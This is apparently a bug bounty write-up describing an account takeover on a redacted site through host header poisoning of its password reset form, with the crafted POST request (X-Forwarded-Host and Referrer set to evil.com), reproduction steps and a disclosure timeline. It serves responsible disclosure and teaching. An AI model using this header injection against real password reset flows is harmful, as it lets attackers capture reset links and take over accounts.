ATO via Host Header Poisoning

Hello Everyone (Ram Ram Ji),

This article is about an account takeover bug via host header poisoning. Redacted.com was vulnerable to host header injection in which remote attackers can exploit it to takeover any account of redacted.com.

Attacking Scenario:

As an attacker, I modified the POST request in which first I change the value of the Host header to evil.com but nothing happened then I add the X-Forwarded-Host header with evil.com value again nothing happened. It was my third attempt now, this time I changed the value of the Referrer header too and put the same value as the X-Forwarded-Host header value and it got worked for me.

Request was looked like:

POST /forgot HTTP/1.1
Host: redacted.com
X-Forwarded-Host: evil.com
Referrer: https://evil.com

username=<username>&_csrf_token=5905477eb5efbc742cb051b922df433a775ae92e

Request Looks Like

After sending the request I got email with host as evil.com looks like:

Got email with malicious host

Step to Reproduce (Acc. to Report):

  1. Navigate to “​https://redacted.com/forgot".
  2. Then enter your username & intercept that request with the help of Burp Suite.
  3. Now add these two headers into the POST request:

X-Forwarded-Host: evil.com
Referrer: https://evil.com

4. Now forward that request and check your email that is linked with your username.

Timeline:

Bounty Rewarded

June 26, 2019 — Reported to private program
August 01, 2019 — Report Triaged
August 08, 2019 — Bounty of $2000 USD awarded
October 24, 2019 — Vulnerability fixed

Special thanks to nullr3x (Big Bad Brother 🤑 )

--

--

--

"CS-Engineer" | "Bughunter • Hackerone • Bugcrowd (Top 150)" | "Synack Red Teamer" • @sechunt3r

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Best Certifications for Breaking into Cybersecurity

Success Criteria, Part III: Trusted

{UPDATE} Sonic the Hedgehog 2 ™ Classic Hack Free Resources Generator

Top AIMx facts to focus on before our IDO

THE enterX TECHNOLOGY

VulnNet: Internal Write-Up

{UPDATE} Duck Hunting 3d Season 2018 Hack Free Resources Generator

Full Overview of Nimbus Liquidity Attack and Implemented Solutions

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Shivam Kamboj Dattana

Shivam Kamboj Dattana

"CS-Engineer" | "Bughunter • Hackerone • Bugcrowd (Top 150)" | "Synack Red Teamer" • @sechunt3r

More from Medium

The Dirty Pipe Vulnerability (CVE-2022–0847) gives Unprivileged Users Root Access

Smag-Grotto CTF Walkthrough

Attacktive Directory — THM

Writeup: Blind OS command injection with time delays @ PortSwigger Academy